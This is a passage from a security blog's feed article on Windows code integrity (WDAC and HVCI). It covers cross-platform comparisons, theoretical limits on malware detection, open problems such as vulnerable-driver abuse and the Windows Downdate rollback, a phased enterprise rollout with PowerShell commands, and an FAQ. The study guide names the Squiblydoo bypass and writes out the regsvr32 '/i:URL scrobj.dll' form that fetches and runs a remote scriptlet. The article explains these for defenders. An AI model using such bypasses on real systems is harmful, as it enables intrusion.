&lt;p&gt;&lt;strong&gt;Android&lt;/strong&gt; combines Android Verified Boot (AVB), introduced in Android 8.0 [@android-verified-boot], which extends a hardware-protected root of trust through bootloader, boot partition, system partition, and vendor partition with rollback protection; the APK Signature Schemes v1 (JAR-based), v2 (Android 7.0), v3 (Android 9) [@android-apk-signing], and v4 (Android 11) [@android-apk-v4]; the Play Integrity API; and a SELinux mandatory-access-control profile. Runtime enforcement happens at the Zygote process forking boundary, at app installation, and at IPC -- not at every PE load. The trust unit is the per-app developer signature, not a tenant-authored policy.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;Windows (WDAC + HVCI)&lt;/th&gt;
&lt;th&gt;macOS&lt;/th&gt;
&lt;th&gt;Linux&lt;/th&gt;
&lt;th&gt;Android&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Tenant-authored policy&lt;/td&gt;
&lt;td&gt;Yes (XML)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (IMA appraise)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hypervisor-rooted enforcement&lt;/td&gt;
&lt;td&gt;Yes (VTL1)&lt;/td&gt;
&lt;td&gt;No (silicon-rooted)&lt;/td&gt;
&lt;td&gt;No (default)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Per-page W$\oplus$X for kernel&lt;/td&gt;
&lt;td&gt;Yes (HVCI)&lt;/td&gt;
&lt;td&gt;Yes (KIP, fixed)&lt;/td&gt;
&lt;td&gt;No (default)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sealed system image&lt;/td&gt;
&lt;td&gt;No (modular)&lt;/td&gt;
&lt;td&gt;Yes (sealed APFS)&lt;/td&gt;
&lt;td&gt;Optional (dm-verity)&lt;/td&gt;
&lt;td&gt;Yes (Verified Boot)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Per-load runtime check&lt;/td&gt;
&lt;td&gt;Yes (every PE)&lt;/td&gt;
&lt;td&gt;Yes (every Mach-O)&lt;/td&gt;
&lt;td&gt;Optional (IMA)&lt;/td&gt;
&lt;td&gt;App install / Zygote&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Trust anchor&lt;/td&gt;
&lt;td&gt;Microsoft + tenant&lt;/td&gt;
&lt;td&gt;Apple only&lt;/td&gt;
&lt;td&gt;TPM PCR / tenant&lt;/td&gt;
&lt;td&gt;AVB key + Google Play&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Documented bypass class&lt;/td&gt;
&lt;td&gt;LOLBINs + BYOVD&lt;/td&gt;
&lt;td&gt;Notarization gaps&lt;/td&gt;
&lt;td&gt;Off-by-default IMA&lt;/td&gt;
&lt;td&gt;Sandbox escapes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The Windows distinction is structural. A &lt;em&gt;hypervisor-rooted&lt;/em&gt; runtime enforcement loop, against an &lt;em&gt;XML-schema author-anywhere policy&lt;/em&gt;, evaluated at &lt;em&gt;every PE load&lt;/em&gt; by a kernel binary that itself cannot run unsigned: no other mainstream OS combines all four properties.The post-CrowdStrike Falcon outage of July 2024 motivated Microsoft to start pushing third-party EDR vendors out of the kernel and into the VBS Trustlet model. Microsoft&apos;s September 2024 Windows endpoint security summit blog post [@ms-resiliency-2024] is the primary record of that pivot. WDAC + HVCI is the kernel-side enforcement layer; VBS Trustlets are the userland-but-isolated enforcement layer. The two cohabit: Trustlets do not replace HVCI, and HVCI does not replace Trustlets. The cross-link to a sibling article on VBS Trustlets is the right place to follow that thread further.&lt;/p&gt;

The Windows answer is structurally singular. Apple is more locked-down but less configurable; Linux is more configurable but less locked-down; Android sits between but enforces at a coarser boundary. Only Windows ships a tenant-configurable XML policy, evaluated by a hypervisor-rooted check, at every page-fault, on every PE load. That ambition is what makes the Windows design teachable. It is also -- precisely because of that ambition -- the design with the deepest theoretical limits.
&lt;p&gt;The Windows answer is structurally singular. It is also, because of that ambition, the answer with the deepest theoretical limits. Two of those limits date back to 1936 and 1986.&lt;/p&gt;
&lt;h2&gt;8. Theoretical Limits: Cohen, Rice, and the Forever-Open Surface&lt;/h2&gt;
&lt;p&gt;Fred Cohen proved in his 1984 paper &lt;em&gt;Computer Viruses -- Theory and Experiments&lt;/em&gt; that the general problem WDAC tries to solve is undecidable. &quot;Detection of a virus is shown to be undecidable both by a-priori and runtime analysis,&quot; [@cohen-eecs588] Cohen wrote in the abstract, &quot;and without detection, containment is, in general, impossible.&quot; Cohen completed his Ph.D. at USC in 1986 [@wikipedia-fred-cohen], where Leonard Adleman (the &lt;em&gt;A&lt;/em&gt; in RSA) was on the faculty and had supervised his earlier 1983 in-class virus demonstration; the paper itself was reprinted in &lt;em&gt;Computers &amp;amp; Security&lt;/em&gt; in 1987. The result is the bedrock theoretical lower bound for every malware-detection system that has ever shipped.&lt;/p&gt;
&lt;p&gt;WDAC is not a detector; it is an &lt;em&gt;allowlist&lt;/em&gt;. That choice is not engineering taste; it is mathematical necessity. An allowlist asks a decidable question -- &lt;em&gt;is this exact bag of bytes, with this exact signature, on the trusted list?&lt;/em&gt; -- which is decidable in O(1) given a hash table. It trades Cohen-decidability for completeness loss: every binary not on the list is refused, including binaries that would have been safe. That tradeoff is the entire engineering shape of WDAC.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; WDAC is not a detector; it is an allowlist. That choice is not engineering taste; it is mathematical necessity. The bypass catalogue is not a backlog of bugs Microsoft hasn&apos;t fixed; it is the empirical residue of an undecidable problem.&lt;/p&gt;
&lt;/blockquote&gt;

Henry Gordon Rice&apos;s 1951 doctoral result at Syracuse University [@wikipedia-rices-theorem]: every non-trivial semantic property of a Turing-complete program is undecidable. &quot;Will this program ever execute arbitrary code from a network argument?&quot; is a semantic property. Rice&apos;s theorem says no static analyser can answer it for `regsvr32.exe`. This is why signed-but-vulnerable LOLBINs persist in Microsoft&apos;s bypass catalogue [@ms-bypass-catalogue] -- Microsoft cannot statically prove that `regsvr32.exe` will not host malicious scriptlets, so the only available remedy is to add it to the deny list inside the allow list.
&lt;p&gt;The W$\oplus$X ceiling is the second theoretical limit. HVCI guarantees that no kernel page is ever both writable and executable, which closes the entire class of attacks that &lt;em&gt;write&lt;/em&gt; a new payload into kernel memory and then jump to it. But a return-oriented or jump-oriented programming gadget chain composed entirely of &lt;em&gt;existing&lt;/em&gt; executable bytes never violates W$\oplus$X. The attacker stitches together short snippets ending in &lt;code&gt;RET&lt;/code&gt; instructions, all of which were already in the kernel&apos;s executable text section, and the resulting computation is Turing-complete. Kernel Data Protection [@ms-kdp-blog] closes the data-corruption variant -- attackers shifting from &lt;em&gt;modify code&lt;/em&gt; to &lt;em&gt;modify data that drives code&lt;/em&gt; -- but the control-flow attack class remains.&lt;/p&gt;
&lt;p&gt;The Driver Block List arms race is the third structural limit. Microsoft&apos;s own Learn page on the Block List [@ms-driver-blocklist] says it out loud -- the verbatim quote is in the PullQuote below. The official list is a curated working set; the LOLDrivers community catalogue [@loldrivers] tracks a four-figure entry count of vulnerable and malicious drivers, with new entries dated as recently as April 2026. The lag is structural. It is the price Microsoft pays for not bricking an entire vendor&apos;s installed base.&lt;/p&gt;

It&apos;s often necessary for us to hold back some blocks to avoid breaking existing functionality while we work with our partners who are engaging their users to update to patched versions. -- Microsoft Learn, Microsoft recommended driver block rules, 2026.
&lt;p&gt;The fourth limit is the bug-bounty calibration. Microsoft prices an L1 guest-to-host RCE in the Hyper-V hypervisor at $5,000 to $250,000 USD [@ms-hyperv-bounty] on its public bounty page. The top of that range is one calibration of how hard the hypervisor-rooted upper bound is to break. It also implies, by negative inference, the floor: any attack that does &lt;em&gt;not&lt;/em&gt; break out of an L1 guest VM is, by definition, not eligible for the top bracket -- so the same bracket is implicitly Microsoft&apos;s view of how much it values an attack that compromises the HVCI substrate from above.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Bound&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;th&gt;What it implies&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Cohen 1986 lower bound&lt;/td&gt;
&lt;td&gt;Cohen, &lt;em&gt;Computer Viruses -- Theory and Experiments&lt;/em&gt; [@cohen-eecs588]&lt;/td&gt;
&lt;td&gt;General malware detection is undecidable; allowlists are the only decidable primitive&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rice&apos;s theorem lower bound&lt;/td&gt;
&lt;td&gt;Rice 1951 [@wikipedia-rices-theorem]&lt;/td&gt;
&lt;td&gt;Static analysis cannot decide non-trivial semantic properties of LOLBINs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Reachable bound&lt;/td&gt;
&lt;td&gt;WDAC + HVCI + KDP + Block List + ASR + Defender for Endpoint&lt;/td&gt;
&lt;td&gt;Decidable allowlist + curated deny list + EDR telemetry on the residual&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Residual surface&lt;/td&gt;
&lt;td&gt;ROP/JOP, signed LOLBINs, BYOVD ahead of cadence, hypervisor rollback&lt;/td&gt;
&lt;td&gt;Microsoft response: KDP, hash-pinned bypass list, VMDRC reporting [@ms-wdsi-driver], KB5042562 [@nvd-cve-2024-21302]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

A short proof-by-existence: the July 2024 Windows Downdate disclosure [@safebreach-downdate] used a downgrade attack to roll back HVCI&apos;s own runtime substrate to a vulnerable older version, exposing previously-fixed kernel bugs. The attack does not violate W$\oplus$X. It violates *temporal trust*: the assumption that the binaries enforcing the policy today are at least as trustworthy as the binaries that were enforcing it yesterday. Microsoft eventually addressed this with KB5042562 and the opt-in revocation policy [@nvd-cve-2024-21302] -- mitigations completed July 8, 2025 -- but the underlying class is still the same: the allowlist is decidable, the input to the allowlist is not.
&lt;p&gt;WDAC + HVCI is the right answer to the wrong question -- because the right question is undecidable. Knowing that, here is what is left for the field to figure out.&lt;/p&gt;
&lt;h2&gt;9. Open Problems: Where Research Lives Today&lt;/h2&gt;
&lt;p&gt;Five live research directions sit on the frontier of the runtime enforcement loop. Each is the &lt;em&gt;next&lt;/em&gt; generation of one of the residuals named in section eight.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Data-only attacks against HVCI and KDP coverage.&lt;/strong&gt; KDP closes the data-corruption gap, but only opt-in per driver [@ms-kdp-blog] -- the driver author has to call &lt;code&gt;MmProtectDriverSection&lt;/code&gt; for static KDP, or allocate from the secure pool for dynamic KDP. Most third-party drivers do not. The open research direction is default-on KDP for drivers above a certain signature level, or compiler-emitted KDP annotations that travel with the build, or VBS-side coverage of the policy data itself rather than per-driver buy-in.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;BYOVD-class drivers faster than the Block List update cadence.&lt;/strong&gt; The Block List ships quarterly, with monthly Windows updates as the delivery mechanism [@ms-driver-blocklist]; the LOLDrivers community catalogue [@loldrivers] operates as the empirical proxy for the gap. The open direction is faster telemetry-to-block pipelines, ideally moving driver decisions out of an explicit hash list and into a per-vendor reputation model that updates within hours of a public disclosure. The Microsoft Vulnerable and Malicious Driver Reporting Center [@ms-wdsi-driver] is the intake side of that pipeline; the public-cadence side is still slower than the LOLDrivers community.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Signed-but-vulnerable user-mode binaries.&lt;/strong&gt; The forty-entry bypass catalogue [@ms-bypass-catalogue] keeps growing as researchers find new Microsoft-signed binaries with arbitrary-code-execution surface. The open direction is a behavioural runtime profile attached to FilePublisher identity, not just the static signature -- so that, for example, &quot;regsvr32 with &lt;code&gt;/i:URL&lt;/code&gt; arguments&quot; can be denied even when &quot;regsvr32 without arguments&quot; is allowed. Some of this lives in Defender&apos;s ASR rules [@ms-asr-rules] today; none of it lives inside WDAC&apos;s static schema.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;HVCI rollback (CVE-2024-21302 Windows Downdate).&lt;/strong&gt; Alon Leviev&apos;s Black Hat USA 2024 disclosure [@safebreach-downdate] used the Windows Update flow itself to downgrade HVCI&apos;s substrate to an older, vulnerable version -- &quot;I successfully downgraded Credential Guard&apos;s Isolated User Mode Process, Secure Kernel, and Hyper-V&apos;s hypervisor to expose past privilege escalation vulnerabilities.&quot; Mitigation was completed July 8, 2025 with KB5042562 [@nvd-cve-2024-21302]. But the Windows Update takeover that &lt;em&gt;delivered&lt;/em&gt; the downgrade remains unpatched [@safebreach-downdate-update] because Microsoft does not consider admin-to-kernel a security boundary; &quot;Gaining kernel code execution as an Administrator is not considered as crossing a security boundary.&quot; The open direction is mandatory &lt;code&gt;dbx&lt;/code&gt; hygiene plus UEFI-locked monotonic version counters for VBS binaries.&lt;/p&gt;

I was able to make a fully patched Windows machine susceptible to thousands of past vulnerabilities, turning fixed vulnerabilities into zero-days and making the term &apos;fully patched&apos; meaningless on any Windows machine in the world. -- Alon Leviev, SafeBreach Labs, Black Hat USA 2024.
&lt;p&gt;&lt;strong&gt;The post-CrowdStrike user-mode-security pivot.&lt;/strong&gt; The July 2024 CrowdStrike Falcon outage motivated Microsoft to push EDR vendors out of the kernel and toward VBS Enclaves; Microsoft&apos;s September 2024 Windows endpoint security summit blog post [@ms-resiliency-2024] is the canonical statement of intent. HVCI remains the kernel-side enforcement layer; the open question is what runtime enforcement looks like when EDR products are themselves trustlets. The cross-link to a sibling article on VBS Trustlets [@paragmali-com-secure-kernel] is the right place to follow that thread, but the practical impact on WDAC + HVCI is concrete: kernel-mode driver count is set to drop, the surface HVCI has to validate shrinks, and the cost-benefit of HVCI&apos;s silicon dependency improves for legacy fleets.The LOLDrivers catalogue [@loldrivers] tracks new BYOVD entries on a daily cadence; recent April 2026 entries include &lt;code&gt;iOCdrv.sys&lt;/code&gt; and &lt;code&gt;Windows_CPU_Temperature_Component.sys&lt;/code&gt;, both classified as &quot;Vulnerable driver.&quot; The Microsoft-shipped Block List trails by months, and that trailing time is the structural feature of the curation discipline -- you cannot ship a Block List update that bricks an entire vendor&apos;s installed base on a Wednesday.&lt;/p&gt;
&lt;p&gt;These are the questions a 2026 Microsoft Senior PM, an MSRC engineer, and a SafeBreach researcher would all answer differently. Here, by contrast, is what is &lt;em&gt;not&lt;/em&gt; contested -- the operational discipline a 2026 administrator should follow today.&lt;/p&gt;
&lt;h2&gt;10. Practical Guide: A Phased Rollout for a 2026 Estate&lt;/h2&gt;
&lt;p&gt;If your estate has neither HVCI nor WDAC on today, here is the four-phase rollout that gets you to the loop section five described, without bricking your fleet.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Phase 0 (week 1) -- silicon verification.&lt;/strong&gt; Run &lt;code&gt;Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard&lt;/code&gt; against a representative sample. Confirm that &lt;code&gt;AvailableSecurityProperties&lt;/code&gt; includes &lt;code&gt;1&lt;/code&gt; (hypervisor support), &lt;code&gt;2&lt;/code&gt; (Secure Boot), and &lt;code&gt;7&lt;/code&gt; (MBEC/GMET reporting in Windows 10 1803 and Windows 11 21H2 or later [@ms-memory-integrity]). Confirm that &lt;code&gt;VirtualizationBasedSecurityStatus = 2&lt;/code&gt; on the same sample. Endpoints that fail Phase 0 either need silicon refresh or a documented &quot;HVCI-incapable&quot; exception with an EDR-only compensating control.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Older silicon falls back to Restricted User Mode emulation, which Microsoft documents as having &quot;a bigger impact on performance&quot; than the silicon-native path. Endpoints that report neither MBEC nor GMET will show measurable per-process startup overhead with HVCI on. Phase 0 is the planning data you need to scope the fleet before you light the feature up.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Phase 1 (weeks 2-4) -- HVCI in audit mode + Driver Block List in enforce.&lt;/strong&gt; Enable HVCI on a wave-1 group; Microsoft Learn documents the Windows Security app toggle and the Group Policy / Intune CSP. Deploy &lt;code&gt;RecommendedDriverBlock_Enforced.xml&lt;/code&gt; [@ms-driver-blocklist] standalone -- the policy is designed to stack alongside any other WDAC policy, including no policy. Triage incompatible drivers through the &lt;code&gt;Microsoft-Windows-DeviceGuard/Operational&lt;/code&gt; channel and remediate vendor-by-vendor. Most enterprises lose one to three drivers per thousand endpoints in this phase; that is the design tax of moving the kernel CI check out of the kernel.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Phase 2 (weeks 5-10) -- WDAC base policy in audit mode.&lt;/strong&gt; Author a base policy from &lt;code&gt;DefaultWindows_Audit.xml&lt;/code&gt; [@ms-example-policies] using &lt;code&gt;New-CIPolicy -Level FilePublisher -Fallback SignedVersion,FilePublisher,Hash -UserPEs -MultiplePolicyFormat&lt;/code&gt;. Deploy in audit. Iterate &lt;code&gt;New-CIPolicy -Audit&lt;/code&gt; against accumulated event-3076 traffic, mint supplemental policies, redeploy. Iterate until the audit-event volume on your representative subset is near-zero. Most production rollouts skip this phase; most production rollouts also have to roll back. Don&apos;t be that rollout.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Phase 3 (weeks 11-16) -- sign and enforce.&lt;/strong&gt; Sign the base policy (&lt;code&gt;Add-SignerRule -Update&lt;/code&gt;, &lt;code&gt;Set-RuleOption -Option 6 -Delete&lt;/code&gt;, &lt;code&gt;ConvertFrom-CIPolicy&lt;/code&gt;, &lt;code&gt;signtool.exe&lt;/code&gt; [@ms-rule-options]). Validate the signed policy on a wave-1 subset &lt;em&gt;before&lt;/em&gt; fleet rollout. Then deploy in enforced mode. Enable the Defender ASR rule &lt;code&gt;56a863a9-875e-4185-98a7-b882c64b5ce5&lt;/code&gt; [@ms-vmdrc-blog] at the Defender for Endpoint policy layer. Integrate the &lt;code&gt;CodeIntegrity-Operational&lt;/code&gt; channel into your SIEM [@ms-asr-rules] via Defender for Endpoint advanced hunting -- the &lt;code&gt;DeviceEvents&lt;/code&gt; table is your join point.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A signed policy is one of the few WDAC operations that can render a Windows machine un-bootable when it goes wrong. Always validate a signed-policy update on a wave-1 subset before fleet rollout. Always confirm that the new signer is in the &lt;code&gt;&amp;lt;UpdatePolicySigner&amp;gt;&lt;/code&gt; element of the &lt;em&gt;currently active&lt;/em&gt; policy &lt;em&gt;before&lt;/em&gt; you ship the new policy. Always increment &lt;code&gt;VersionEx&lt;/code&gt; monotonically. None of these are nice-to-haves.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Phase 4 (ongoing) -- continuous tuning.&lt;/strong&gt; Quarterly: refresh the Driver Block List policy [@ms-driver-blocklist]; review ISG verdicts (if rule option 14 is on); re-evaluate the LOLBIN bypass list [@ms-bypass-catalogue] against your signed-by-Microsoft inventory; check the LOLDrivers community catalogue [@loldrivers] for new vulnerable drivers your environment ships.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Audit volume goes near-zero before enforce, not &quot;low&quot; before enforce. The 3076 events you see in audit are the 3077 events you will see in enforce, and every 3077 event in production is a paged-out application your users cannot run. Iterate the supplemental-policy authoring loop until the audit volume genuinely flatlines, then enforce.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The &quot;do not do&quot; list is short and cheap. Do not deploy a signed policy without first validating the unsigned variant -- the &lt;code&gt;VersionEx&lt;/code&gt; boot failure is the single most common production casualty. Do not rely on AppLocker as your primary control on Windows 10 or 11; Microsoft&apos;s own AppLocker overview [@ms-applocker-overview] disqualifies the feature as a security boundary. Do not turn HVCI off to &quot;fix&quot; driver compatibility -- patch the driver, replace the vendor, or document an exception with a sunset date.&lt;/p&gt;

```powershell
Get-CimInstance -ClassName Win32_DeviceGuard `
  -Namespace root\Microsoft\Windows\DeviceGuard |
  Select-Object AvailableSecurityProperties,
                VirtualizationBasedSecurityStatus,
                SecurityServicesRunning,
                CodeIntegrityPolicyEnforcementStatus
```
Pipe the output into your SIEM, group by silicon family, and you have your Phase 0 capacity model.
&lt;p&gt;After Phase 3, the loop section five described is running on every endpoint in your estate. After Phase 4, you are participating in the loop&apos;s continuous evolution. The remaining question is whether your understanding of the loop survives contact with the misconceptions every administrator brings to it.&lt;/p&gt;
&lt;h2&gt;11. FAQ: The Misconceptions This Article Closes&lt;/h2&gt;
&lt;p&gt;Eight misconceptions surface in nearly every WDAC + HVCI conversation. Here are the corrections, in priority order.&lt;/p&gt;

No. They share the AppLocker Application Identity service [@ms-applocker-overview] for some surfaces (Managed Installer, the ISG plumbing), but the two are different products under different servicing regimes. WDAC is serviced under MSRC criteria as a security feature [@ms-acfb-overview], meaning Microsoft treats a bypass as a vulnerability. Microsoft documents AppLocker [@ms-applocker-overview] as a defense-in-depth feature, not a defensible security boundary -- the verbatim quote anchors the §3 Definition and PullQuote above. MSRC will not service AppLocker bypasses.

No. NX (the No-Execute bit on x86-64) is a permission bit the CPU&apos;s MMU consults on every page access -- but the page-table entries that drive it live in memory the kernel maintains and the kernel can write. If an attacker has SYSTEM in ring 0, they can change the page-table entries the MMU consults. HVCI is a per-VTL SLAT permission state [@ms-kdp-blog] held in the hypervisor&apos;s page tables, validated by `SkCi.dll` in VTL1, which a SYSTEM-level attacker in VTL0 cannot reach. NX&apos;s enforcement substrate is editable by the attacker; HVCI&apos;s is not.

No, not at the running enforcement layer. HVCI is enforced by the hypervisor; a SYSTEM-level kernel attacker can disable the *registry key* that determines whether HVCI loads on next boot, but cannot turn off the running enforcement on the current boot. Even the registry-key disable is detectable -- the `CodeIntegrity-Operational` channel [@ms-driver-blocklist] records the change, and a configured EDR will pick it up. The 2024 Windows Downdate disclosure is the most recent qualifier on this answer: a sufficiently sophisticated attacker can roll back the binaries that *implement* HVCI, but the July 2025 KB5042562 mitigation [@nvd-cve-2024-21302] closed that vector for the documented CVE.

No. Smart App Control [@ms-sac-support] is the same `CI.dll` engine consuming an example WDAC policy (`SmartAppControl.xml` / `SignedReputable.xml` [@ms-example-policies]) tuned for consumer trust verdicts. It uses the same cloud reputation primitive as the Intelligent Security Graph [@ms-isg], the same Authenticode validation, and the same per-PE-load evaluation cadence. The differences are: it is opt-in at consumer install time, it has no per-app exception model, and it auto-disables for users whose behavioural profile suggests they are developers.

No. Microsoft holds back blocks for compatibility [@ms-driver-blocklist] -- the canonical Microsoft Learn position is that breaking an entire vendor&apos;s installed base is unacceptable, so the list ships as a curated working set on a quarterly cadence with monthly Windows updates as the delivery vehicle. The verbatim &quot;hold back some blocks&quot; quote anchors the §8 PullQuote above. The LOLDrivers community catalogue [@loldrivers] tracks a four-figure entry count of vulnerable and malicious drivers, with new entries dated as recently as April 2026; the lag between LOLDrivers and the shipped Block List is days to months.

No. The Microsoft Learn memory-integrity page [@ms-memory-integrity] reconciles all three names; the verbatim quote anchors the §4b *HVCI / Memory Integrity* Definition above. Three names; one feature; one `SkCi.dll`; one architectural inversion of Blue Pill.

Only if you remove the Script Enforcement opt-out (rule option 11, `Disabled:Script Enforcement` [@ms-rule-options]). The default is to enforce script-host coverage for the binaries listed in the bypass catalogue [@ms-bypass-catalogue] -- which means a WDAC-enforced endpoint runs PowerShell in Constrained Language Mode by default for non-allowlisted scripts. PowerShell scripts that are signed by a trusted signer continue to run in Full Language Mode.

Mostly. But some policy options change behaviour even in audit mode -- for example, `Disabled:Runtime FilePath Rule Protection` [@ms-rule-options] removes the runtime user-writeability check on path rules whether or not enforcement is on, and `Required:WHQL` (rule option 2) is a hard requirement that does not have an audit-only counterpart. Test thoroughly. Audit mode is necessary discipline; it is not a permission to ignore policy semantics.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; A bag of bytes is not its identity. Where it sits is not its identity. Even who signed it is not its identity. Identity is a runtime decision made by code that itself cannot be tampered with -- and the only way to make that code tamper-resistant is to host it underneath the operating system the attacker has compromised.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That sentence is what every generation since SRP 2001 has been re-learning at a different layer. WDAC + HVCI is the layer Microsoft is willing to service like a security boundary. The next layer is whatever attack class research publishes in 2027.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;wdac-hvci-code-integrity-at-every-layer-in-windows&quot; keyTerms={[
  { term: &quot;WDAC&quot;, definition: &quot;Windows Defender Application Control / App Control for Business -- the configurable code integrity engine that evaluates a SiPolicy XML at every PE load via CI.dll.&quot; },
  { term: &quot;HVCI&quot;, definition: &quot;Hypervisor-protected Code Integrity -- the hypervisor-rooted check that runs SkCi.dll in VTL1 and enforces W$\oplus$X for kernel pages via SLAT entries.&quot; },
  { term: &quot;BYOVD&quot;, definition: &quot;Bring Your Own Vulnerable Driver -- the attack class in which a privileged operator loads a signed-but-vulnerable driver to gain ring 0 code execution.&quot; },
  { term: &quot;VTL0 / VTL1&quot;, definition: &quot;Virtual Trust Levels 0 and 1 -- the hypervisor-enforced privilege separation that puts the Secure Kernel and SkCi.dll out of reach of a SYSTEM-level VTL0 attacker.&quot; },
  { term: &quot;Squiblydoo&quot;, definition: &quot;Casey Smith&apos;s April 2016 AppLocker bypass via regsvr32.exe /i:URL scrobj.dll, the canonical demonstration that publisher-only identity is necessary but not sufficient.&quot; },
  { term: &quot;SiPolicy XML&quot;, definition: &quot;The schema for a WDAC policy: Rules, Signers, FileRules, SigningScenarios, HvciOptions, UpdatePolicySigners, SupplementalPolicySigners, CiSigners.&quot; },
  { term: &quot;Driver Block List&quot;, definition: &quot;Microsoft&apos;s recommended deny list of vulnerable and malicious kernel drivers, shipped as RecommendedDriverBlock_Enforced.xml and on by default with HVCI on Windows 11 22H2+.&quot; },
  { term: &quot;ASR rule 56a863a9-875e-4185-98a7-b882c64b5ce5&quot;, definition: &quot;The Defender for Endpoint &apos;Block abuse of exploited vulnerable signed drivers&apos; rule that pairs with the Block List as the EDR-side telemetry partner.&quot; },
  { term: &quot;Cohen 1984/1986&quot;, definition: &quot;Fred Cohen&apos;s 1984 paper Computer Viruses -- Theory and Experiments (included in his 1986 USC PhD dissertation under Leonard Adleman): general malware detection is undecidable -- the lower-bound theoretical justification for why WDAC must be an allowlist, not a detector.&quot; },
  { term: &quot;Rice&apos;s theorem&quot;, definition: &quot;Henry Gordon Rice&apos;s 1951 result that every non-trivial semantic property of a Turing-complete program is undecidable -- the lower-bound justification for why signed-but-vulnerable LOLBINs cannot be statically eliminated.&quot; }
]} questions={[
  { q: &quot;What two engines refused the dbutil_2_3.sys load that opens this article, and where do they sit?&quot;, a: &quot;CI.dll in VTL0 builds the verdict from the Driver Block List (a standalone WDAC policy); SkCi.dll in VTL1 ratifies it; the hypervisor enforces the W-&amp;gt;X SLAT refusal that emits CodeIntegrity-Operational event 3033.&quot; },
  { q: &quot;Why is a publisher rule for O=Microsoft Corporation insufficient against Squiblydoo?&quot;, a: &quot;Because the publisher rule scopes trust to the binary&apos;s signer, not the binary&apos;s behaviour. regsvr32.exe is signed by Microsoft and exposes a /i:URL flag that fetches and executes a remote scriptlet; the publisher rule allows the binary, the scriptlet runs in-process, and AppLocker logs a successful launch.&quot; },
  { q: &quot;What is the architectural inversion HVCI performs against Joanna Rutkowska&apos;s 2006 Blue Pill argument?&quot;, a: &quot;Blue Pill argued the hypervisor was the attacker&apos;s substrate to fear. HVCI moves the kernel CI check into VTL1, hosted by the hypervisor Microsoft owns -- so the hypervisor becomes the defender&apos;s substrate, and a SYSTEM-level VTL0 kernel attacker cannot reach VTL1.&quot; },
  { q: &quot;Why does the Driver Block List always lag behind the LOLDrivers community catalogue?&quot;, a: &quot;Microsoft holds back blocks for compatibility, in its own words -- shipping a Block List update that bricks an entire vendor&apos;s installed base is unacceptable, so the list ships as a curated working set on a quarterly cadence with monthly Windows updates as the delivery vehicle.&quot; },
  { q: &quot;What is the audit-to-enforce discipline, and why is skipping it the most common cause of WDAC rollout failure?&quot;, a: &quot;Deploy in audit; harvest CodeIntegrity-Operational event 3076; mint supplemental policies with New-CIPolicy -Audit; merge and redeploy; iterate until audit volume is near-zero; then Set-RuleOption -Option 3 -Delete to switch to enforce. Skipping the iteration is what produces production casualties: every 3076 event you see in audit is a 3077 enforce-block in production, which is a paged-out application your users cannot run.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>wdac</category><category>hvci</category><category>app-control</category><category>kernel</category><category>byovd</category><category>application-control</category><category>memory-integrity</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>WebAuthn and Passkeys on Windows: From CTAP to the Credential Provider Model</title><link>https://paragmali.com/blog/webauthn-and-passkeys-on-windows-from-ctap-to-the-credential/</link><guid isPermaLink="true">https://paragmali.com/blog/webauthn-and-passkeys-on-windows-from-ctap-to-the-credential/</guid><description>The know/have/are taxonomy collapses against modern phishing kits. Passkeys, WebAuthn Level 3, CTAP 2.x, and Windows 11 24H2 third-party providers score against the criteria that actually matter -- and recovery is the load-bearing column.</description><pubDate>Mon, 11 May 2026 00:00:00 GMT</pubDate><content:encoded>
